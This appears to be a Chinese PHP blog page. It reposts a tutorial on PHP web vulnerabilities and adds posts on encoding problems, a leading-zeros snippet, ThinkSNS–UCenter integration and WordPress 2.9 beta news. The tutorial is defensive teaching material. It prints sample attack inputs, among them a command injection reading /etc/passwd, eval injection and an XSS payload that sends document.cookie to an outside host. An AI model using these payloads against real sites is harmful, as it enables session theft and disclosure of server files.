手机浏览 RSS 2.0 订阅 膘叔的简单人生 , 腾讯云RDS购买 | 超便宜的Vultr , 注册 | 登陆
浏览模式: 标准 | 列表分类:PHP

PHP漏洞全解【转】

说是全解,其实倒更不如说是一些介绍。虽然没有什么明确的解决方案,但是了解一下,对于自己的代码也可以有针对性的防范。。。内容还是有点乱,还有一点重复内容,估计原作者也只是做了一个集中吧?
而且对于6往后的内容,并没有加入。。。。不知道以后会不会加上

原文如下:
PHP网页的安全性问题
针对PHP的网站主要存在下面几种攻击方式:
1.命令注入(Command Injection)
2.eval注入(Eval Injection)
3.客户端脚本攻击(Script Insertion)
4.跨网站脚本攻击(Cross Site Scripting, XSS)
5.SQL注入攻击(SQL injection)
6.跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF)
7.Session 会话劫持(Session Hijacking)
8.Session 固定攻击(Session Fixation)
9.HTTP响应拆分攻击(HTTP Response Splitting)
10.文件上传漏洞(File Upload Attack)
11.目录穿越漏洞(Directory Traversal)
12.远程文件包含攻击(Remote Inclusion)
13.动态函数注入攻击(Dynamic Variable Evaluation)
14.URL攻击(URL attack)
15.表单提交欺骗攻击(Spoofed Form Submissions)
16.HTTP请求欺骗攻击(Spoofed HTTP Requests)

几个重要的php.ini选项
Register Globals
php>=4.2.0,php.ini的register_globals选项的默认值预设为Off,当register_globals的设定为 On时,程序可以接收来自服务器的各种环境变量,包括表单提交的变量,而且由于PHP不必事先初始化变量的值,从而导致很大的安全隐患.
例1:
//check_admin()用于检查当前用户权限,如果是admin设置$is_admin变量为true,然后下面判断此变量是否为true,然后执行管理的一些操作
//ex1.php
<?php
if (check_admin())
{
         $is_admin = true;
}
if ($is_admin)
{
         do_something();
}
?>
这一段代码没有将$is_admin事先初始化为Flase,如果register_globals为On,那么我们直接提交 http://www.sectop.com/ex1.php?is_admin=true,就可以绕过check_admin()的验证

例2:
//ex2.php
<?php
if (isset($_SESSION["username"]))
{
         do_something();
}
else
{
         echo "您尚未登录!";
}
?>
当register_globals=On时,我们提交http://www.sectop.com/ex2.php?_SESSION[username]=dodo,就具有了此用户的权限
所以不管register_globals为什么,我们都要记住,对于任何传输的数据要经过仔细验证,变量要初始化

safe_mode
安全模式,PHP用来限制文档的存取.限制环境变量的存取,控制外部程序的执行.启用安全模式必须设置php.ini中的safe_mode = On
1.限制文件存取
safe_mode_include_dir = "/path1:/path2:/path3"
不同的文件夹用冒号隔开
2.限制环境变量的存取
safe_mode_allowed_env_vars = string
指定PHP程序可以改变的环境变量的前缀,如:safe_mode_allowed_env_vars = PHP_ ,当这个选项的值为空时,那么php可以改变任何环境变量
safe_mode_protected_env_vars = string
用来指定php程序不可改变的环境变量的前缀
3.限制外部程序的执行
safe_mode_exec_dir = string
此选项指定的文件夹路径影响system.exec.popen.passthru,不影响shell_exec和"` `".
disable_functions = string
不同的函数名称用逗号隔开,此选项不受安全模式影响

magic quotes
用来让php程序的输入信息自动转义,所有的单引号("'"),双引号("""),反斜杠("\")和空字符(NULL),都自动被加上反斜杠进行转义
magic_quotes_gpc = On 用来设置magic quotes 为On,它会影响HTTP请求的数据(GET.POST.Cookies)
程序员也可以使用addslashes来转义提交的HTTP请求数据,或者用stripslashes来删除转义

命令注入攻击
PHP中可以使用下列5个函数来执行外部的应用程序或函数
system.exec.passthru.shell_exec.``(与shell_exec功能相同)
函数原型
string system(string command, int &return_var)
command 要执行的命令
return_var 存放执行命令的执行后的状态值
string exec (string command, array &output, int &return_var)
command 要执行的命令
output 获得执行命令输出的每一行字符串
return_var 存放执行命令后的状态值
void passthru (string command, int &return_var)
command 要执行的命令
return_var 存放执行命令后的状态值
string shell_exec (string command)
command 要执行的命令

漏洞实例
例1:
//ex1.php
<?php
$dir = $_GET["dir"];
if (isset($dir))
{
         echo "<pre>";
         system("ls -al ".$dir);
         echo "</pre>";
}
?>
我们提交http://www.sectop.com/ex1.php?dir=| cat /etc/passwd
提交以后,命令变成了 system("ls -al | cat /etc/passwd");


eval注入攻击
eval函数将输入的字符串参数当作PHP程序代码来执行
函数原型:
mixed eval(string code_str) //eval注入一般发生在攻击者能控制输入的字符串的时候
//ex2.php
<?php
$var = "var";
if (isset($_GET["arg"]))
{
         $arg = $_GET["arg"];
         eval("\$var = $arg;");
         echo "\$var =".$var;
}
?>
当我们提交 http://www.sectop.com/ex2.php?arg=phpinfo();漏洞就产生了
动态函数
<?php
func A()
{
         dosomething();
}
func B()
{
         dosomething();
}
if (isset($_GET["func"]))
{
         $myfunc = $_GET["func"];
         echo $myfunc();
}
?>
程序员原意是想动态调用A和B函数,那我们提交http://www.sectop.com/ex.php?func=phpinfo 漏洞产生


防范方法
1.尽量不要执行外部命令
2.使用自定义函数或函数库来替代外部命令的功能
3.使用escapeshellarg函数来处理命令参数
4.使用safe_mode_exec_dir指定可执行文件的路径
esacpeshellarg函数会将任何引起参数或命令结束的字符转义,单引号"'",替换成"\'",双引号""",替换成"\"",分号";"替换成"\;"
用safe_mode_exec_dir指定可执行文件的路径,可以把会使用的命令提前放入此路径内
safe_mode = On
safe_mode_exec_di r= /usr/local/php/bin/



客户端脚本植入
客户端脚本植入(Script Insertion),是指将可以执行的脚本插入到表单.图片.动画或超链接文字等对象内.当用户打开这些对象后,攻击者所植入的脚本就会被执行,进而开始攻击.
可以被用作脚本植入的HTML标签一般包括以下几种:
1.<script>标签标记的javascript和vbscript等页面脚本程序.在<script>标签内可以指定js程序代码,也可以在src属性内指定js文件的URL路径
2.<object>标签标记的对象.这些对象是java applet.多媒体文件和ActiveX控件等.通常在data属性内指定对象的URL路径
3.<embed>标签标记的对象.这些对象是多媒体文件,例如:swf文件.通常在src属性内指定对象的URL路径
4.<applet>标签标记的对象.这些对象是java applet,通常在codebase属性内指定对象的URL路径
5.<form>标签标记的对象.通常在action属性内指定要处理表单数据的web应用程序的URL路径

客户端脚本植入的攻击步骤
1.攻击者注册普通用户后登陆网站
2.打开留言页面,插入攻击的js代码
3.其他用户登录网站(包括管理员),浏览此留言的内容
4.隐藏在留言内容中的js代码被执行,攻击成功
实例
数据库
Create TABLE `postmessage` (
   `id` int(11) NOT NULL auto_increment,
   `subject` varchar(60) NOT NULL default '',
   `name` varchar(40) NOT NULL default '',
   `email` varchar(25) NOT NULL default '',
   `question` mediumtext NOT NULL,
   `postdate` datetime NOT NULL default '0000-00-00 00:00:00',
   PRIMARY KEY   (`id`)
) ENGINE=MyISAM   DEFAULT CHARSET=gb2312 COMMENT='使用者的留言' AUTO_INCREMENT=69 ;
//add.php 插入留言
//list.php 留言列表
//show.php 显示留言
浏览此留言的时候会执行js脚本
插入 <script>while(1){windows.open();}</script> 无限弹框
插入<script>location.href="http://www.sectop.com";</script> 跳转钓鱼页面
或者使用其他自行构造的js代码进行攻击

防范的方法
一般使用htmlspecialchars函数来将特殊字符转换成HTML编码
函数原型
string htmlspecialchars (string string, int quote_style, string charset)
string 是要编码的字符串
quote_style 可选,值可为ENT_COMPAT ENT_QUOTES ENT_NOQUOTES,默认值ENT_COMPAT,表示只转换双引号不转换单引号.ENT_QUOTES,表示双引号和单引号都要转 换.ENT_NOQUOTES,表示双引号和单引号都不转换
charset 可选,表示使用的字符集
函数会将下列特殊字符转换成html编码:
& ----> &
" ----> "
' ----> '
< ----> <
> ----> >
把show.php的第98行改成
<?php echo htmlspecialchars(nl2br($row['question']), ENT_QUOTES); ?>


然后再查看插入js的漏洞页面
xss跨站脚本攻击
XSS(Cross Site Scripting),意为跨网站脚本攻击,为了和样式表css(Cascading Style Sheet)区别,缩写为XSS
跨站脚本主要被攻击者利用来读取网站用户的cookies或者其他个人数据,一旦攻击者得到这些数据,那么他就可以伪装成此用户来登录网站,获得此用户的权限.
跨站脚本攻击的一般步骤:
1.攻击者以某种方式发送xss的http链接给目标用户
2.目标用户登录此网站,在登陆期间打开了攻击者发送的xss链接
3.网站执行了此xss攻击脚本
4.目标用户页面跳转到攻击者的网站,攻击者取得了目标用户的信息
5.攻击者使用目标用户的信息登录网站,完成攻击
当有存在跨站漏洞的程序出现的时候,攻击者可以构造类似 http://www.sectop.com/search.php?key=<script>document.location='http://www.hack.com/getcookie.php?cookie='+document.cookie;</script> ,诱骗用户点击后,可以获取用户cookies值
防范方法:
利用htmlspecialchars函数将特殊字符转换成HTML编码
函数原型
string htmlspecialchars (string string, int quote_style, string charset)
string 是要编码的字符串
quote_style 可选,值可为ENT_COMPAT、ENT_QUOTES、ENT_NOQUOTES,默认值ENT_COMPAT,表示只转换双引号不


$_SERVER["PHP_SELF"]变量的跨站

在某个表单中,如果提交参数给自己,会用这样的语句
<form action="<?php echo $_SERVER["PHP_SELF"];?>" method="POST">
......
</form>
$_SERVER["PHP_SELF"]变量的值为当前页面名称
例:
http://www.sectop.com/get.php
get.php中上述的表单
那么我们提交
http://www.sectop.com/get.php/"><script>alert(document.cookie);</script>
那么表单变成
<form action="get.php/"><script>alert(document.cookie);</script>" method="POST">
跨站脚本被插进去了
防御方法还是使用htmlspecialchars过滤输出的变量,或者提交给自身文件的表单使用
<form action="" method="post">
这样直接避免了$_SERVER["PHP_SELF"]变量被跨站



SQL注入攻击
SQL注入攻击(SQL Injection),是攻击者在表单中提交精心构造的sql语句,改变原来的sql语句,如果web程序没有对提交的数据经过检查,那么就会造成sql注入攻击.
SQL注入攻击的一般步骤:
1.攻击者访问有SQL注入漏洞的网站,寻找注入点
2.攻击者构造注入语句,注入语句和程序中的SQL语句结合生成新的sql语句
3.新的sql语句被提交到数据库中进行处理
4.数据库执行了新的SQL语句,引发SQL注入攻击

原文地址:http://hi.baidu.com/isbx/blog/item/80ea6c22ea1efaae4723e838.html

完美解决PHP中文乱码

关于以下内容,我对于数据库那段还真的不知道。。。原来可以通过这样的方式来强制执行我们一直会遗忘的那句话:set names utf8。。。

PHP中文乱码一般是字符集问题,编码主要有下面几个问题。

一.首先是PHP网页的编码

1.     php文件本身的编码与网页的编码应匹配

a.     如果欲使用gb2312编码,那么php要输出头:header(“Content-Type: text/html; charset=gb2312"),静态页面添加<meta http-equiv="Content-Type" content="text/html; charset=gb2312">,所有文件的编码格式为ANSI,可用记事本打开,另存为选择编码为ANSI,覆盖源文件。

b.     如果欲使用utf-8编码,那么php要输出头:header(“Content-Type: text/html; charset=utf-8"),静态页面添加<meta http-equiv="Content-Type" content="text/html; charset=utf-8">,所有文件的编码格式为utf-8。保存为utf-8可能会有点麻烦,一般utf-8文件开头会有BOM,如果使用 session就会出问题,可用editplus来保存,在editplus中,工具->参数选择->文件->UTF-8签名,选择总 是删除,再保存就可以去掉BOM信息了。

2.     php本身不是Unicode的,所有substr之类的函数得改成mb_substr(需要装mbstring扩展);或者用iconv转码。

二.PHP与Mysql的数据交互

PHP与数据库的编码应一致

1.     修改mysql配置文件my.ini或my.cnf,mysql最好用utf8编码

SQL代码
  1. [mysql]  
  2. default-character-set=utf8  
  3. [mysqld]  
  4. default-character-set=utf8  
  5. default-storage-engine=MyISAM  
  6. 在[mysqld]下加入:  
  7. default-collation=utf8_bin  
  8. init_connect='SET NAMES utf8'  

2.     在需要做数据库操作的php程序前加mysql_query("set names '编码'");,编码和php编码一致,如果php编码是gb2312那mysql编码就是gb2312,如果是utf-8那mysql编码就是 utf8,这样插入或检索数据时就不会出现乱码了

三.PHP与操作系统相关

         Windows和Linux的编码是不一样的,在Windows环境下,调用PHP的函数时参数如果是utf-8编码会出现错误,比如 move_uploaded_file()、filesize()、readfile()等,这些函数在处理上传、下载时经常会用到,调用时可能会出现下 面的错误:

PHP代码
  1. Warning: move_uploaded_file()[function.move-uploaded-file]:failed to open stream: Invalid argument in ...  
  2.   
  3. Warning: move_uploaded_file()[function.move-uploaded-file]:Unable to move '' to '' in ...  
  4.   
  5. Warning: filesize() [function.filesize]: stat failed for ... in ...  
  6.   
  7. Warning: readfile() [function.readfile]: failed to open stream: Invalid argument in ..  

 

     在Linux环境下用gb2312编码虽然不会出现这些错误,但保存后的文件名出现乱码导致无法读取文件,这时可先将参数转换成操作系统识别的编码,编码 转换可用mb_convert_encoding(字符串,新编码,原编码)或iconv(原编码,新编码,字符串),这样处理后保存的文件名就不会出现 乱码,也可以正常读取文件,实现中文名称文件的上传、下载。

    其实还有更好的解决方法,彻底与系统脱离,也就不用考虑系统是何编码。可以生成一个只有字母和数字的序列作为文件名,而将原来带有中文的名字保存在数据库 中,这样调用move_uploaded_file()就不会出现问题,下载的时候只需将文件名改为原来带有中文的名字。实现下载的代码如下

PHP代码
  1. header("Pragma: public");  
  2. header("Expires: 0");  
  3. header("Cache-Component: must-revalidate, post-check=0, pre-check=0");  
  4. header("Content-type: $file_type");  
  5. header("Content-Length: $file_size");  
  6. header("Content-Disposition: attachment; filename=\"$file_name\"");  
  7. header("Content-Transfer-Encoding: binary");  
  8. readfile($file_path);    

$file_type是文件的类型,$file_name是原来的名字,$file_path是保存在服务上文件的地址。

本文来自CSDN博客,转载请标明出处:http://blog.csdn.net/wufongming/archive/2008/11/08/3256186.aspx

一小段代码

群内突然有人【桔子】提问:

PHP代码
  1. $str = '0001';//这个数有可能是'001020'……请问怎么取到前导有多少个'0'?('0001'结果为3,'001020'结果为2)  

然后自问自答,说这些是他同事写的:

PHP代码
  1. //算法1  
  2. $str = '001020';  
  3. echo strlen(str_replace((int)$str''$str));  
  4.   
  5. //算法2  
  6. $text = '0001';  
  7. $zero = strlen($text) - strlen(ltrim($text'0'));  
  8. return $zero;  

然后说了他自己写的:

PHP代码
  1. $string = '000 012012';  
  2. $string = str_replace(' '''$string);  
  3. $length = strlen($string);  
  4.   
  5. $x = 0;  
  6. for ($i = 0; $i < $length$i++)  
  7. {  
  8. $currentStr = $string{$i};  
  9. if ($currentStr != 0)  
  10. {  
  11. break;  
  12. }  
  13. $x++;  
  14. }  
  15. echo $x;  

 

最后我也写了两个,一个正则,一个是利用现有函数:

 

PHP代码
  1. $str = '00 0 000100002000';  
  2. preg_match( "/^0{0,}/"str_replace" """$str ), $out );  
  3. echo$out[0] );  
  4.   
  5. $str = '00 0 000100002000';  
  6. $tt = str_word_count(str_replace" """$str ),1,'0');  
  7. echo$tt[0] );  

之所以要用str_replace,也是因为桔子说的,以防当中有空格。但事实上,如果出这种题目,应该是不会有空格的吧?

 

哈哈完事。。。

thinksns在整合Ucenter的时候注意事项

thinksns在整合ucenter的时候难度并不大。主要有几个思路,不要错过就行了

1、不要想着把thinkphp框架整合进去,那样只会让你效率大低
2、合理应用thinksns提供的API,在API里面有取得当前登录用户的资料等信息,而且也有一个比较完整的数据库操作类【主要是不需要再调用config等配置了】

3、利用ucenter整合的时候,只能利用thinksns的一个cookie: remembor【开始为了这个我折腾了半天,我一直都打成remember。。。。汗一下先】(由于现在我是在一台机器上试,对于$_SERVER['USER_AGENT']是否一致还没有完全测试。。。)

4、整合的两个重要环节就是同步登录和退出。登录的时候要注意一下,两边的密码机制不一样,第一次同步资料的时候需要注意一下,否则一旦整合就不能使用原来的密码了。

5、同步登录的时候,如果需要强制注册,则必须要调用$api->user_add($data)这样的方法,具体的变量参数可以参考thinksns的lib中的indexAction.class.php ,顺便说一下,它的代码,注册中的隐私,其实没有插数据库。。。。骗子啊

6、起初的时候,我考虑需要读系统配置,就调用了$api->option_get()结果出错,由于ucenter api的出错是不显示的。调试了半天,才发现。原来是option_get()调用的get方法中,居然有一个ts_cache函数,而这个函数却是在api的范围之外,即它是属于thinksns的common方法中,在api中并没有被包含进来。。导致无法执行出错。

其他就没啥了。。至于feed同步啥的,则需要一点点的测试和更新,以同步到thinksns的feed库中。是个劳心劳力的过程。

PS:我会把本文同步到http://www.ucapi.com/wiki/上

Tags: thinksns, ucenter

WordPress 2.9 beta1 发布

套用网上流行的一句:哥聊的不是天,哥聊的是寂寞,我也要在这里说,我讨论的不是wordpress,我讨论的是sablog

其实很有意思啦,明明是wordpress的新闻发布,结果评论却是sablog的拥护者在与wordpress拥护者火拼。偶尔也插上一个bo-blog用户的感慨
当然,这几个程序我都用过,最早在bo-blog出mysql版前,我也用过文本版的,那时候的程序很简单,安全性和实用性也一般。现在当然不一样了。
SAblog嘛,我就不说了,你看我的博客建立有多久,sablog就用了有多久。除了改过一些模版,程序我就几乎没有动过(当然前段时间sablog评论被攻击的时候,还是改了一下程序),虽然程序简单,但也毕竟几乎2年没有出过啥大漏洞。挺不错了除了模版是类似 phpwind 我不习惯外,其他都好
wordpress嘛。大而全,普通人上手也能用,后台也可以自动安装插件等,确实不错,只是后台嘛,略慢一点。别说我没有发言权,我在现在的服务器上有正好有三个BLOG,大家可以尝试一下
1、sablog ,就是本勃客啦。。。
2、bo-blog,http://www.fotonomad.org
3、wordpress,http://g.52cd.net

以下内容来自cnbeta。。。
WordPress 2.8.6安全更新刚刚几天,今天,11月16日,WordPress官方发布了WordPress 2.9的第一个测试版本:WordPress 2.9 beta 1。
beta版本都不太稳定,不喜欢折腾的朋友可以暂时不用升级,等正式版出来了再说;喜欢折腾的朋友,可以试试Wopus下面几篇文章中提到的新功能,特别 是WordPress 2.9提供的数据库修复、优化功能。现在WordPress官方还为在后台提示更新(目前的提示更新版本依然是:WordPress 2.8.6),所以需要测试的朋友,可以在文章最底下下载WordPress 2.9 beta 1,解压,上传覆盖。

两个老生常谈的问题:升级前请备份数据库;测试请尽量用官方英文版,请不要使用中文版。

WordPress 2.9对空间欢迎的要求:

数据库版本: MySQL 4.1.2 or 更高 (老版本只需要 4.0),之前Wopus也有过一篇文章:WordPress 2.9对空间环境要求更高:

WordPress 2.9对空间环境要求:

  • PHP 5
  • MySQL 4.1.2 or greater
  • The mod_rewrite Apache module


WordPress 2.9新增功能:(功能详解请查看原文)

WordPress 2.9功能:在线编辑图片

WordPress 2.9新功能:回收站

WordPress 2.9新功能:批量升级插件

WordPress 2.9新功能:修复、优化数据库

除了Wopus列出来的,还有很多功能,但基本上我们都体会不到,也就没有再一一列举。除此之外,WordPress 2.9对主题和插件的函数也有改动。详细请查看这里

比较引人瞩目的是,WordPress官方目前提供了两种下载格式,一种是IIS的,也就是Win系统服务器。现在加上伪静态的模块,Win系统服务器也可以完美的支持WordPress了。

WordPress 2.9 beta 1下载:

官方下载:Linux服务器版本 | IIS版本

地址为:http://www.cnbeta.com/articles/97982.htm

Tags: wordpress, sablog, bo-blog